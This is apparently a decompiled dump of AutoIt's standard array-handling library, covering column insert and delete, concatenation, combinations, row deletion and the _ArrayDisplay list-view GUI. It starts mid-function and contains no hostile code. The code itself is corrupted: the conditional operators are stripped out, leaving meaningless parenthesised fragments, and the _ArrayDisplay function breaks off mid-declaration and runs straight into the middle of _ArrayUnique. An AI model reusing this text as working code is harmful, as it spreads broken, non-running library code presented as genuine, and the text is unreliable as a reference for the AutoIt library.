2 LOCAL $IDIM_2 = UBOUND ($AARRAY , $UBOUND_COLUMNS ) + 4294967295 IF $ICOLUMN < 0 OR $ICOLUMN > $IDIM_2 THEN RETURN SETERROR (7 , 0 , + 4294967295 ) IF $AARRAY [$ISTART ] [$ICOLUMN ] > $VVALUE OR $AARRAY [$IEND ] [$ICOLUMN ] < $VVALUE THEN RETURN SETERROR (2 , 0 , + 4294967295 ) WHILE $ISTART <= $IMID AND $VVALUE <> $AARRAY [$IMID ] [$ICOLUMN ] IF $VVALUE < $AARRAY [$IMID ] [$ICOLUMN ] THEN $IEND = $IMID + 4294967295 ELSE $ISTART = $IMID + 1 ENDIF $IMID = INT (($IEND + $ISTART ) / 2 ) WEND IF $ISTART > $IEND THEN RETURN SETERROR (3 , 0 , + 4294967295 ) CASE ELSE RETURN SETERROR (5 , 0 , + 4294967295 ) ENDSWITCH RETURN $IMID ENDFUNC FUNC _ARRAYCOLDELETE (BYREF $AARRAY , $ICOLUMN , $BCONVERT = FALSE ) IF $BCONVERT = DEFAULT THEN $BCONVERT = FALSE IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $IDIM_1 = UBOUND ($AARRAY , $UBOUND_ROWS ) IF UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) <> 2 THEN RETURN SETERROR (2 , 0 , + 4294967295 ) LOCAL $IDIM_2 = UBOUND ($AARRAY , $UBOUND_COLUMNS ) SWITCH $IDIM_2 CASE 2 IF $ICOLUMN < 0 OR $ICOLUMN > 1 THEN 
RETURN SETERROR (3 , 0 , + 4294967295 ) IF $BCONVERT THEN LOCAL $ATEMPARRAY [$IDIM_1 ] FOR $I = 0 TO $IDIM_1 + 4294967295 $ATEMPARRAY [$I ] = $AARRAY [$I ] [(NOT $ICOLUMN ) ] NEXT $AARRAY = $ATEMPARRAY ELSE CONTINUECASE ENDIF CASE ELSE IF $ICOLUMN < 0 OR $ICOLUMN > $IDIM_2 + 4294967295 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) FOR $I = 0 TO $IDIM_1 + 4294967295 FOR $J = $ICOLUMN TO $IDIM_2 + 4294967294 $AARRAY [$I ] [$J ] = $AARRAY [$I ] [$J + 1 ] NEXT NEXT REDIM $AARRAY [$IDIM_1 ] [$IDIM_2 + 4294967295 ] ENDSWITCH RETURN UBOUND ($AARRAY , $UBOUND_COLUMNS ) ENDFUNC FUNC _ARRAYCOLINSERT (BYREF $AARRAY , $ICOLUMN ) IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $IDIM_1 = UBOUND ($AARRAY , $UBOUND_ROWS ) SWITCH UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) CASE 1 LOCAL $ATEMPARRAY [$IDIM_1 ] [2 ] SWITCH $ICOLUMN CASE 0 , 1 FOR $I = 0 TO $IDIM_1 + 4294967295 $ATEMPARRAY [$I ] [(NOT $ICOLUMN ) ] = $AARRAY [$I ] NEXT CASE ELSE RETURN SETERROR (3 , 0 , + 4294967295 ) ENDSWITCH $AARRAY = $ATEMPARRAY CASE 2 LOCAL $IDIM_2 = UBOUND ($AARRAY , $UBOUND_COLUMNS ) IF $ICOLUMN < 0 OR $ICOLUMN > $IDIM_2 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) REDIM $AARRAY [$IDIM_1 ] [$IDIM_2 + 1 ] FOR $I = 0 TO $IDIM_1 + 4294967295 FOR $J = $IDIM_2 TO $ICOLUMN + 1 STEP + 4294967295 $AARRAY [$I ] [$J ] = $AARRAY [$I ] [$J + 4294967295 ] NEXT $AARRAY [$I ] [$ICOLUMN ] = "" NEXT CASE ELSE RETURN SETERROR (2 , 0 , + 4294967295 ) ENDSWITCH RETURN UBOUND ($AARRAY , $UBOUND_COLUMNS ) ENDFUNC FUNC _ARRAYCOMBINATIONS (CONST BYREF $AARRAY , $ISET , $SDELIMITER = "" ) IF $SDELIMITER = DEFAULT THEN $SDELIMITER = "" IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , 0 ) IF UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) <> 1 THEN RETURN SETERROR (2 , 0 , 0 ) LOCAL $IN = UBOUND ($AARRAY ) LOCAL $IR = $ISET LOCAL $AIDX [$IR ] FOR $I = 0 TO $IR + 4294967295 $AIDX [$I ] = $I NEXT LOCAL $ITOTAL = __ARRAY_COMBINATIONS ($IN , $IR ) LOCAL $ILEFT = $ITOTAL LOCAL $ARESULT [$ITOTAL + 1 ] 
$ARESULT [0 ] = $ITOTAL LOCAL $ICOUNT = 1 WHILE $ILEFT > 0 __ARRAY_GETNEXT ($IN , $IR , $ILEFT , $ITOTAL , $AIDX ) FOR $I = 0 TO $ISET + 4294967295 $ARESULT [$ICOUNT ] &= $AARRAY [$AIDX [$I ] ] & $SDELIMITER NEXT IF $SDELIMITER <> "" THEN $ARESULT [$ICOUNT ] = STRINGTRIMRIGHT ($ARESULT [$ICOUNT ] , 1 ) $ICOUNT += 1 WEND RETURN $ARESULT ENDFUNC FUNC _ARRAYCONCATENATE (BYREF $AARRAYTARGET , CONST BYREF $AARRAYSOURCE , $ISTART = 0 ) IF $ISTART = DEFAULT THEN $ISTART = 0 IF NOT ISARRAY ($AARRAYTARGET ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) IF NOT ISARRAY ($AARRAYSOURCE ) THEN RETURN SETERROR (2 , 0 , + 4294967295 ) LOCAL $IDIM_TOTAL_TGT = UBOUND ($AARRAYTARGET , $UBOUND_DIMENSIONS ) LOCAL $IDIM_TOTAL_SRC = UBOUND ($AARRAYSOURCE , $UBOUND_DIMENSIONS ) LOCAL $IDIM_1_TGT = UBOUND ($AARRAYTARGET , $UBOUND_ROWS ) LOCAL $IDIM_1_SRC = UBOUND ($AARRAYSOURCE , $UBOUND_ROWS ) IF $ISTART < 0 OR $ISTART > $IDIM_1_SRC + 4294967295 THEN RETURN SETERROR (6 , 0 , + 4294967295 ) SWITCH $IDIM_TOTAL_TGT CASE 1 IF $IDIM_TOTAL_SRC <> 1 THEN RETURN SETERROR (4 , 0 , + 4294967295 ) REDIM $AARRAYTARGET [$IDIM_1_TGT + $IDIM_1_SRC - $ISTART ] FOR $I = $ISTART TO $IDIM_1_SRC + 4294967295 $AARRAYTARGET [$IDIM_1_TGT + $I - $ISTART ] = $AARRAYSOURCE [$I ] NEXT CASE 2 IF $IDIM_TOTAL_SRC <> 2 THEN RETURN SETERROR (4 , 0 , + 4294967295 ) LOCAL $IDIM_2_TGT = UBOUND ($AARRAYTARGET , $UBOUND_COLUMNS ) IF UBOUND ($AARRAYSOURCE , $UBOUND_COLUMNS ) <> $IDIM_2_TGT THEN RETURN SETERROR (5 , 0 , + 4294967295 ) REDIM $AARRAYTARGET [$IDIM_1_TGT + $IDIM_1_SRC - $ISTART ] [$IDIM_2_TGT ] FOR $I = $ISTART TO $IDIM_1_SRC + 4294967295 FOR $J = 0 TO $IDIM_2_TGT + 4294967295 $AARRAYTARGET [$IDIM_1_TGT + $I - $ISTART ] [$J ] = $AARRAYSOURCE [$I ] [$J ] NEXT NEXT CASE ELSE RETURN SETERROR (3 , 0 , + 4294967295 ) ENDSWITCH RETURN UBOUND ($AARRAYTARGET , $UBOUND_ROWS ) ENDFUNC FUNC _ARRAYDELETE (BYREF $AARRAY , $VRANGE ) IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $IDIM_1 = UBOUND 
($AARRAY , $UBOUND_ROWS ) + 4294967295 IF ISARRAY ($VRANGE ) THEN IF UBOUND ($VRANGE , $UBOUND_DIMENSIONS ) <> 1 OR UBOUND ($VRANGE , $UBOUND_ROWS ) < 2 THEN RETURN SETERROR (4 , 0 , + 4294967295 ) ELSE LOCAL $INUMBER , $ASPLIT_1 , $ASPLIT_2 $VRANGE = STRINGSTRIPWS ($VRANGE , 8 ) $ASPLIT_1 = STRINGSPLIT ($VRANGE , ";" ) $VRANGE = "" FOR $I = 1 TO $ASPLIT_1 [0 ] IF NOT STRINGREGEXP ($ASPLIT_1 [$I ] , "^\d+(-\d+)?$" ) THEN RETURN SETERROR (3 , 0 , + 4294967295 ) $ASPLIT_2 = STRINGSPLIT ($ASPLIT_1 [$I ] , "-" ) SWITCH $ASPLIT_2 [0 ] CASE 1 $VRANGE &= $ASPLIT_2 [1 ] & ";" CASE 2 IF NUMBER ($ASPLIT_2 [2 ] ) >= NUMBER ($ASPLIT_2 [1 ] ) THEN $INUMBER = $ASPLIT_2 [1 ] + 4294967295 DO $INUMBER += 1 $VRANGE &= $INUMBER & ";" UNTIL $INUMBER = $ASPLIT_2 [2 ] ENDIF ENDSWITCH NEXT $VRANGE = STRINGSPLIT (STRINGTRIMRIGHT ($VRANGE , 1 ) , ";" ) ENDIF IF $VRANGE [1 ] < 0 OR $VRANGE [$VRANGE [0 ] ] > $IDIM_1 THEN RETURN SETERROR (5 , 0 , + 4294967295 ) LOCAL $ICOPYTO_INDEX = 0 SWITCH UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) CASE 1 FOR $I = 1 TO $VRANGE [0 ] $AARRAY [$VRANGE [$I ] ] = CHRW (64177 ) NEXT FOR $IREADFROM_INDEX = 0 TO $IDIM_1 IF $AARRAY [$IREADFROM_INDEX ] == CHRW (64177 ) THEN CONTINUELOOP ELSE IF $IREADFROM_INDEX <> $ICOPYTO_INDEX THEN $AARRAY [$ICOPYTO_INDEX ] = $AARRAY [$IREADFROM_INDEX ] ENDIF $ICOPYTO_INDEX += 1 ENDIF NEXT REDIM $AARRAY [$IDIM_1 - $VRANGE [0 ] + 1 ] CASE 2 LOCAL $IDIM_2 = UBOUND ($AARRAY , $UBOUND_COLUMNS ) + 4294967295 FOR $I = 1 TO $VRANGE [0 ] $AARRAY [$VRANGE [$I ] ] [0 ] = CHRW (64177 ) NEXT FOR $IREADFROM_INDEX = 0 TO $IDIM_1 IF $AARRAY [$IREADFROM_INDEX ] [0 ] == CHRW (64177 ) THEN CONTINUELOOP ELSE IF $IREADFROM_INDEX <> $ICOPYTO_INDEX THEN FOR $J = 0 TO $IDIM_2 $AARRAY [$ICOPYTO_INDEX ] [$J ] = $AARRAY [$IREADFROM_INDEX ] [$J ] NEXT ENDIF $ICOPYTO_INDEX += 1 ENDIF NEXT REDIM $AARRAY [$IDIM_1 - $VRANGE [0 ] + 1 ] [$IDIM_2 + 1 ] CASE ELSE RETURN SETERROR (2 , 0 , FALSE ) ENDSWITCH RETURN UBOUND ($AARRAY , $UBOUND_ROWS ) ENDFUNC FUNC 
_ARRAYDISPLAY (CONST BYREF $AARRAY , $STITLE = DEFAULT , $SARRAYRANGE = DEFAULT , $IFLAGS = DEFAULT , $VUSER_SEPARATOR = DEFAULT , $SHEADER = DEFAULT , $IMAX_COLWIDTH = DEFAULT , $IALT_COLOR = DEFAULT , $HUSER_FUNCTION = DEFAULT ) IF $STITLE = DEFAULT THEN $STITLE = "ArrayDisplay" IF $SARRAYRANGE = DEFAULT THEN $SARRAYRANGE = "" IF $IFLAGS = DEFAULT THEN $IFLAGS = 0 IF $VUSER_SEPARATOR = DEFAULT THEN $VUSER_SEPARATOR = "" IF $SHEADER = DEFAULT THEN $SHEADER = "" IF $IMAX_COLWIDTH = DEFAULT THEN $IMAX_COLWIDTH = 350 IF $IALT_COLOR = DEFAULT THEN $IALT_COLOR = 0 IF $HUSER_FUNCTION = DEFAULT THEN $HUSER_FUNCTION = 0 LOCAL $ITRANSPOSE = BITAND ($IFLAGS , 1 ) LOCAL $ICOLALIGN = BITAND ($IFLAGS , 6 ) LOCAL $IVERBOSE = BITAND ($IFLAGS , 8 ) LOCAL $IBUTTONMARGIN = ((BITAND ($IFLAGS , 32 ) ) (0 ) ((BITAND ($IFLAGS , 16 ) ) (20 ) (40 ) ) ) LOCAL $INOROW = BITAND ($IFLAGS , 64 ) LOCAL $SMSG = "" , $IRET = 1 IF ISARRAY ($AARRAY ) THEN LOCAL $IDIMENSION = UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) , $IROWCOUNT = UBOUND ($AARRAY , $UBOUND_ROWS ) , $ICOLCOUNT = UBOUND ($AARRAY , $UBOUND_COLUMNS ) IF $IDIMENSION > 2 THEN $SMSG = "Larger than 2D array passed to function" $IRET = 2 ENDIF ELSE $SMSG = "No array variable passed to function" ENDIF IF $SMSG THEN IF $IVERBOSE AND MSGBOX ($MB_SYSTEMMODAL + $MB_ICONERROR + $MB_YESNO , "ArrayDisplay Error: " & $STITLE , $SMSG & @CRLF & @CRLF & "Exit the script?" 
) = $IDYES THEN EXIT ELSE RETURN SETERROR ($IRET , 0 , "" ) ENDIF ENDIF LOCAL $ICW_COLWIDTH = NUMBER ($VUSER_SEPARATOR ) LOCAL $SAD_SEPARATOR = CHRW (64177 ) LOCAL $SCURR_SEPARATOR = OPT ("GUIDataSeparatorChar" , $SAD_SEPARATOR ) IF $VUSER_SEPARATOR = "" THEN $VUSER_SEPARATOR = $SCURR_SEPARATOR LOCAL $VTMP , $IROWLIMIT = 65525 , $ICOLLIMIT = 250 LOCAL $IDATAROW = $IROWCOUNT LOCAL $IDATACOL = $ICOLCOUNT LOCAL $IITEM_START = 0 , $IITEM_END = $IROWCOUNT + 4294967295 , $ISUBITEM_START = 0 , $ISUBITEM_END = (($IDIMENSION = 2 ) ($ICOLCOUNT + 4294967295 ) (0 ) ) LOCAL $BRANGE_FLAG = FALSE , $AVRANGESPLIT IF $SARRAYRANGE THEN LOCAL $AARRAY_RANGE = STRINGREGEXP ($SARRAYRANGE & "||" , "(?U)(.*)\|" , 3 ) IF $AARRAY_RANGE [0 ] THEN $AVRANGESPLIT = STRINGSPLIT ($AARRAY_RANGE [0 ] , ":" ) IF @ERROR THEN $IITEM_END = NUMBER ($AVRANGESPLIT [1 ] ) ELSE $IITEM_START = NUMBER ($AVRANGESPLIT [1 ] ) $IITEM_END = NUMBER ($AVRANGESPLIT [2 ] ) ENDIF ENDIF IF $IITEM_START > $IITEM_END THEN $VTMP = $IITEM_START $IITEM_START = $IITEM_END $IITEM_END = $VTMP ENDIF IF $IITEM_START < 0 THEN $IITEM_START = 0 IF $IITEM_END > $IROWCOUNT + 4294967295 THEN $IITEM_END = $IROWCOUNT + 4294967295 IF $IITEM_START <> 0 OR $IITEM_END <> $IROWCOUNT + 4294967295 THEN $BRANGE_FLAG = TRUE IF $IDIMENSION = 2 AND $AARRAY_RANGE [1 ] THEN $AVRANGESPLIT = STRINGSPLIT ($AARRAY_RANGE [1 ] , ":" ) IF @ERROR THEN $ISUBITEM_END = NUMBER ($AVRANGESPLIT [1 ] ) ELSE $ISUBITEM_START = NUMBER ($AVRANGESPLIT [1 ] ) $ISUBITEM_END = NUMBER ($AVRANGESPLIT [2 ] ) ENDIF IF $ISUBITEM_START > $ISUBITEM_END THEN $VTMP = $ISUBITEM_START $ISUBITEM_START = $ISUBITEM_END $ISUBITEM_END = $VTMP ENDIF IF $ISUBITEM_START < 0 THEN $ISUBITEM_START = 0 IF $ISUBITEM_END > $ICOLCOUNT + 4294967295 THEN $ISUBITEM_END = $ICOLCOUNT + 4294967295 IF $ISUBITEM_START <> 0 OR $ISUBITEM_END <> $ICOLCOUNT + 4294967295 THEN $BRANGE_FLAG = TRUE ENDIF ENDIF LOCAL $SDISPLAYDATA = "[" & $IDATAROW LOCAL $BTRUNCATED = FALSE IF $ITRANSPOSE THEN IF $IITEM_END - 
$IITEM_START > $ICOLLIMIT THEN $BTRUNCATED = TRUE $IITEM_END = $IITEM_START + $ICOLLIMIT + 4294967295 ENDIF ELSE IF $IITEM_END - $IITEM_START > $IROWLIMIT THEN $BTRUNCATED = TRUE $IITEM_END = $IITEM_START + $IROWLIMIT + 4294967295 ENDIF ENDIF IF $BTRUNCATED THEN $SDISPLAYDATA &= "*]" ELSE $SDISPLAYDATA &= "]" ENDIF IF $IDIMENSION = 2 THEN $SDISPLAYDATA &= " [" & $IDATACOL IF $ITRANSPOSE THEN IF $ISUBITEM_END - $ISUBITEM_START > $IROWLIMIT THEN $BTRUNCATED = TRUE $ISUBITEM_END = $ISUBITEM_START + $IROWLIMIT + 4294967295 ENDIF ELSE IF $ISUBITEM_END - $ISUBITEM_START > $ICOLLIMIT THEN $BTRUNCATED = TRUE $ISUBITEM_END = $ISUBITEM_START + $ICOLLIMIT + 4294967295 ENDIF ENDIF IF $BTRUNCATED THEN $SDISPLAYDATA &= "*]" ELSE $SDISPLAYDATA &= "]" ENDIF ENDIF LOCAL $STIPDATA = "" IF $BTRUNCATED THEN $STIPDATA &= "Truncated" IF $BRANGE_FLAG THEN IF $STIPDATA THEN $STIPDATA &= " - " $STIPDATA &= "Range set" ENDIF IF $ITRANSPOSE THEN IF $STIPDATA THEN $STIPDATA &= " - " $STIPDATA &= "Transposed" ENDIF LOCAL $ASHEADER = STRINGSPLIT ($SHEADER , $SCURR_SEPARATOR , $STR_NOCOUNT ) IF UBOUND ($ASHEADER ) = 0 THEN LOCAL $ASHEADER [1 ] = ["" ] $SHEADER = "Row" LOCAL $IINDEX = $ISUBITEM_START IF $ITRANSPOSE THEN FOR $J = $IITEM_START TO $IITEM_END $SHEADER &= $SAD_SEPARATOR & "Col " & $J NEXT ELSE IF $ASHEADER [0 ] THEN FOR $IINDEX = $ISUBITEM_START TO $ISUBITEM_END IF $IINDEX >= UBOUND ($ASHEADER ) THEN EXITLOOP $SHEADER &= $SAD_SEPARATOR & $ASHEADER [$IINDEX ] NEXT ENDIF FOR $J = $IINDEX TO $ISUBITEM_END $SHEADER &= $SAD_SEPARATOR & "Col " & $J NEXT ENDIF IF $INOROW THEN $SHEADER = STRINGTRIMLEFT ($SHEADER , 4 ) IF $IVERBOSE AND ($IITEM_END - $IITEM_START + 1 ) * ($ISUBITEM_END - $ISUBITEM_START + 1 ) > 10000 THEN SPLASHTEXTON ("ArrayDisplay" , "Preparing display" & @CRLF & @CRLF & "Please be patient" , 300 , 100 ) ENDIF LOCAL $IBUFFER = 4094 IF $ITRANSPOSE THEN $VTMP = $IITEM_START $IITEM_START = $ISUBITEM_START $ISUBITEM_START = $VTMP $VTMP = $IITEM_END $IITEM_END = $ISUBITEM_END 
$ISUBITEM_END = $VTMP ENDIF LOCAL $AVARRAYTEXT [$IITEM_END - $IITEM_START + 1 ] FOR $I = $IITEM_START TO $IITEM_END IF NOT $INOROW THEN $AVARRAYTEXT [$I - $IITEM_START ] = "[" & $I & "]" FOR $J = $ISUBITEM_START TO $ISUBITEM_END IF $IDIMENSION = 1 THEN IF $ITRANSPOSE THEN SWITCH VARGETTYPE ($AARRAY [$J ] ) CASE "Array" $VTMP = "{Array}" CASE ELSE $VTMP = $AARRAY [$J ] ENDSWITCH ELSE SWITCH VARGETTYPE ($AARRAY [$I ] ) CASE "Array" $VTMP = "{Array}" CASE ELSE $VTMP = $AARRAY [$I ] ENDSWITCH ENDIF ELSE IF $ITRANSPOSE THEN SWITCH VARGETTYPE ($AARRAY [$J ] [$I ] ) CASE "Array" $VTMP = "{Array}" CASE ELSE $VTMP = $AARRAY [$J ] [$I ] ENDSWITCH ELSE SWITCH VARGETTYPE ($AARRAY [$I ] [$J ] ) CASE "Array" $VTMP = "{Array}" CASE ELSE $VTMP = $AARRAY [$I ] [$J ] ENDSWITCH ENDIF ENDIF IF STRINGLEN ($VTMP ) > $IBUFFER THEN $VTMP = STRINGLEFT ($VTMP , $IBUFFER ) $AVARRAYTEXT [$I - $IITEM_START ] &= $SAD_SEPARATOR & $VTMP NEXT IF $INOROW THEN $AVARRAYTEXT [$I - $IITEM_START ] = STRINGTRIMLEFT ($AVARRAYTEXT [$I - $IITEM_START ] , 1 ) NEXT LOCAL CONST $_ARRAYCONSTANT_GUI_DOCKBOTTOM = 64 LOCAL CONST $_ARRAYCONSTANT_GUI_DOCKBORDERS = 102 LOCAL CONST $_ARRAYCONSTANT_GUI_DOCKHEIGHT = 512 LOCAL CONST $_ARRAYCONSTANT_GUI_DOCKLEFT = 2 LOCAL CONST $_ARRAYCONSTANT_GUI_DOCKRIGHT = 4 LOCAL CONST $_ARRAYCONSTANT_GUI_DOCKHCENTER = 8 LOCAL CONST $_ARRAYCONSTANT_GUI_EVENT_CLOSE = + 4294967293 LOCAL CONST $_ARRAYCONSTANT_GUI_FOCUS = 256 LOCAL CONST $_ARRAYCONSTANT_GUI_BKCOLOR_LV_ALTERNATE = 4261412864 LOCAL CONST $_ARRAYCONSTANT_SS_CENTER = 1 LOCAL CONST $_ARRAYCONSTANT_SS_CENTERIMAGE = 512 LOCAL CONST $_ARRAYCONSTANT_LVM_GETITEMCOUNT = (4096 + 4 ) LOCAL CONST $_ARRAYCONSTANT_LVM_GETITEMRECT = (4096 + 14 ) LOCAL CONST $_ARRAYCONSTANT_LVM_GETCOLUMNWIDTH = (4096 + 29 ) LOCAL CONST $_ARRAYCONSTANT_LVM_SETCOLUMNWIDTH = (4096 + 30 ) LOCAL CONST $_ARRAYCONSTANT_LVM_GETITEMSTATE = (4096 + 44 ) LOCAL CONST $_ARRAYCONSTANT_LVM_GETSELECTEDCOUNT = (4096 + 50 ) LOCAL CONST 
$_ARRAYCONSTANT_LVM_SETEXTENDEDLISTVIEWSTYLE = (4096 + 54 ) LOCAL CONST $_ARRAYCONSTANT_LVS_EX_GRIDLINES = 1 LOCAL CONST $_ARRAYCONSTANT_LVIS_SELECTED = 2 LOCAL CONST $_ARRAYCONSTANT_LVS_SHOWSELALWAYS = 8 LOCAL CONST $_ARRAYCONSTANT_LVS_EX_FULLROWSELECT = 32 LOCAL CONST $_ARRAYCONSTANT_WS_EX_CLIENTEDGE = 512 LOCAL CONST $_ARRAYCONSTANT_WS_MAXIMIZEBOX = 65536 LOCAL CONST $_ARRAYCONSTANT_WS_MINIMIZEBOX = 131072 LOCAL CONST $_ARRAYCONSTANT_WS_SIZEBOX = 262144 LOCAL CONST $_ARRAYCONSTANT_WM_SETREDRAW = 11 LOCAL CONST $_ARRAYCONSTANT_LVSCW_AUTOSIZE = + 4294967295 LOCAL $ICOORDMODE = OPT ("GUICoordMode" , 1 ) LOCAL $IORGWIDTH = 210 , $IHEIGHT = 200 , $IMINSIZE = 250 LOCAL $HGUI = GUICREATE ($STITLE , $IORGWIDTH , $IHEIGHT , DEFAULT , DEFAULT , BITOR ($_ARRAYCONSTANT_WS_SIZEBOX , $_ARRAYCONSTANT_WS_MINIMIZEBOX , $_ARRAYCONSTANT_WS_MAXIMIZEBOX ) ) LOCAL $AIGUISIZE = WINGETCLIENTSIZE ($HGUI ) LOCAL $IBUTTONWIDTH_2 = $AIGUISIZE [0 ] / 2 LOCAL $IBUTTONWIDTH_3 = $AIGUISIZE [0 ] / 3 LOCAL $IDLISTVIEW = GUICTRLCREATELISTVIEW ($SHEADER , 0 , 0 , $AIGUISIZE [0 ] , $AIGUISIZE [1 ] - $IBUTTONMARGIN , $_ARRAYCONSTANT_LVS_SHOWSELALWAYS ) GUICTRLSETBKCOLOR ($IDLISTVIEW , $_ARRAYCONSTANT_GUI_BKCOLOR_LV_ALTERNATE ) GUICTRLSENDMSG ($IDLISTVIEW , $_ARRAYCONSTANT_LVM_SETEXTENDEDLISTVIEWSTYLE , $_ARRAYCONSTANT_LVS_EX_GRIDLINES , $_ARRAYCONSTANT_LVS_EX_GRIDLINES ) GUICTRLSENDMSG ($IDLISTVIEW , $_ARRAYCONSTANT_LVM_SETEXTENDEDLISTVIEWSTYLE , $_ARRAYCONSTANT_LVS_EX_FULLROWSELECT , $_ARRAYCONSTANT_LVS_EX_FULLROWSELECT ) GUICTRLSENDMSG ($IDLISTVIEW , $_ARRAYCONSTANT_LVM_SETEXTENDEDLISTVIEWSTYLE , $_ARRAYCONSTANT_WS_EX_CLIENTEDGE , $_ARRAYCONSTANT_WS_EX_CLIENTEDGE ) LOCAL $IDCOPY_ID = 9999 , $IDCOPY_DATA = 99999 , $IDDATA_LABEL = 99999 , $IDUSER_FUNC = 99999 , $IDEXIT_SCRIPT = 99999 IF $IBUTTONMARGIN THEN $IDCOPY_ID = GUICTRLCREATEBUTTON ("Copy Data && Hdr/Row" , 0 , $AIGUISIZE [1 ] - $IBUTTONMARGIN , $IBUTTONWIDTH_2 , 20 ) $IDCOPY_DATA = GUICTRLCREATEBUTTON ("Copy Data Only" , $IBUTTONWIDTH_2 , 
$AIGUISIZE [1 ] - $IBUTTONMARGIN , $IBUTTONWIDTH_2 , 20 ) IF $IBUTTONMARGIN = 40 THEN LOCAL $IBUTTONWIDTH_VAR = $IBUTTONWIDTH_2 LOCAL $IOFFSET = $IBUTTONWIDTH_2 IF ISFUNC ($HUSER_FUNCTION ) THEN $IDUSER_FUNC = GUICTRLCREATEBUTTON ("Run User Func" , $IBUTTONWIDTH_3 , $AIGUISIZE [1 ] + 4294967276 , $IBUTTONWIDTH_3 , 20 ) $IBUTTONWIDTH_VAR = $IBUTTONWIDTH_3 $IOFFSET = $IBUTTONWIDTH_3 * 2 ENDIF $IDEXIT_SCRIPT = GUICTRLCREATEBUTTON ("Exit Script" , $IOFFSET , $AIGUISIZE [1 ] + 4294967276 , $IBUTTONWIDTH_VAR , 20 ) $IDDATA_LABEL = GUICTRLCREATELABEL ($SDISPLAYDATA , 0 , $AIGUISIZE [1 ] + 4294967276 , $IBUTTONWIDTH_VAR , 18 , BITOR ($_ARRAYCONSTANT_SS_CENTER , $_ARRAYCONSTANT_SS_CENTERIMAGE ) ) SELECT CASE $BTRUNCATED OR $ITRANSPOSE OR $BRANGE_FLAG GUICTRLSETCOLOR ($IDDATA_LABEL , 16711680 ) GUICTRLSETTIP ($IDDATA_LABEL , $STIPDATA ) ENDSELECT ENDIF ENDIF GUICTRLSETRESIZING ($IDLISTVIEW , $_ARRAYCONSTANT_GUI_DOCKBORDERS ) GUICTRLSETRESIZING ($IDCOPY_ID , $_ARRAYCONSTANT_GUI_DOCKLEFT + $_ARRAYCONSTANT_GUI_DOCKBOTTOM + $_ARRAYCONSTANT_GUI_DOCKHEIGHT ) GUICTRLSETRESIZING ($IDCOPY_DATA , $_ARRAYCONSTANT_GUI_DOCKRIGHT + $_ARRAYCONSTANT_GUI_DOCKBOTTOM + $_ARRAYCONSTANT_GUI_DOCKHEIGHT ) GUICTRLSETRESIZING ($IDDATA_LABEL , $_ARRAYCONSTANT_GUI_DOCKLEFT + $_ARRAYCONSTANT_GUI_DOCKBOTTOM + $_ARRAYCONSTANT_GUI_DOCKHEIGHT ) GUICTRLSETRESIZING ($IDUSER_FUNC , $_ARRAYCONSTANT_GUI_DOCKHCENTER + $_ARRAYCONSTANT_GUI_DOCKBOTTOM + $_ARRAYCONSTANT_GUI_DOCKHEIGHT ) GUICTRLSETRESIZING ($IDEXIT_SCRIPT , $_ARRAYCONSTANT_GUI_DOCKRIGHT + $_ARRAYCONSTANT_GUI_DOCKBOTTOM + $_ARRAYCONSTANT_GUI_DOCKHEIGHT ) GUICTRLSENDMSG ($IDLISTVIEW , $_ARRAYCONSTANT_WM_SETREDRAW , 0 , 0 ) LOCAL $IDITEM FOR $I = 0 TO UBOUND ($AVARRAYTEXT ) + 4294967295 $IDITEM = GUICTRLCREATELISTVIEWITEM ($AVARRAYTEXT [$I ] , $IDLISTVIEW ) IF $IALT_COLOR THEN GUICTRLSETBKCOLOR ($IDITEM , $IALT_COLOR ) ENDIF NEXT IF $ICOLALIGN THEN LOCAL CONST $_ARRAYCONSTANT_LVCF_FMT = 1 LOCAL CONST $_ARRAYCONSTANT_LVM_SETCOLUMNW = (4096 + 96 ) LOCAL 
IF $IBASE = DEFAULT THEN $IBASE = 0 IF $ICASE = DEFAULT THEN $ICASE = 0 IF $ICOUNT = DEFAULT THEN $ICOUNT = $ARRAYUNIQUE_COUNT IF UBOUND ($AARRAY , $UBOUND_ROWS ) = 0 THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $IDIMS = UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) , $INUMCOLUMNS = UBOUND ($AARRAY , $UBOUND_COLUMNS ) IF $IDIMS > 2 THEN RETURN SETERROR (2 , 0 , 0 ) IF $IBASE < 0 OR $IBASE > 1 OR (NOT ISINT ($IBASE ) ) THEN RETURN SETERROR (3 , 0 , 0 ) IF $ICASE < 0 OR $ICASE > 1 OR (NOT ISINT ($ICASE ) ) THEN RETURN SETERROR (3 , 0 , 0 ) IF $ICOUNT < 0 OR $ICOUNT > 1 OR (NOT ISINT ($ICOUNT ) ) THEN RETURN SETERROR (4 , 0 , 0 ) IF $IINTTYPE < 0 OR $IINTTYPE > 4 OR (NOT ISINT ($IINTTYPE ) ) THEN RETURN SETERROR (5 , 0 , 0 ) IF $ICOLUMN < 0 OR ($INUMCOLUMNS = 0 AND $ICOLUMN > 0 ) OR ($INUMCOLUMNS > 0 AND $ICOLUMN >= $INUMCOLUMNS ) THEN RETURN SETERROR (6 , 0 , 0 ) IF $IINTTYPE = $ARRAYUNIQUE_AUTO THEN LOCAL $VFIRSTELEM = (($IDIMS = 1 ) ($AARRAY [$IBASE ] ) ($AARRAY [$ICOLUMN ] [$IBASE ] ) ) IF ISINT ($VFIRSTELEM ) THEN SWITCH VARGETTYPE ($VFIRSTELEM ) CASE "Int32" $IINTTYPE = $ARRAYUNIQUE_FORCE32 CASE "Int64" $IINTTYPE = $ARRAYUNIQUE_FORCE64 ENDSWITCH ELSE $IINTTYPE = $ARRAYUNIQUE_FORCE32 ENDIF ENDIF OBJEVENT ("AutoIt.Error" , "__ArrayUnique_AutoErrFunc" ) LOCAL $ODICTIONARY = OBJCREATE ("Scripting.Dictionary" ) $ODICTIONARY.CompareMode = NUMBER (NOT $ICASE ) LOCAL $VELEM , $STYPE , $VKEY , 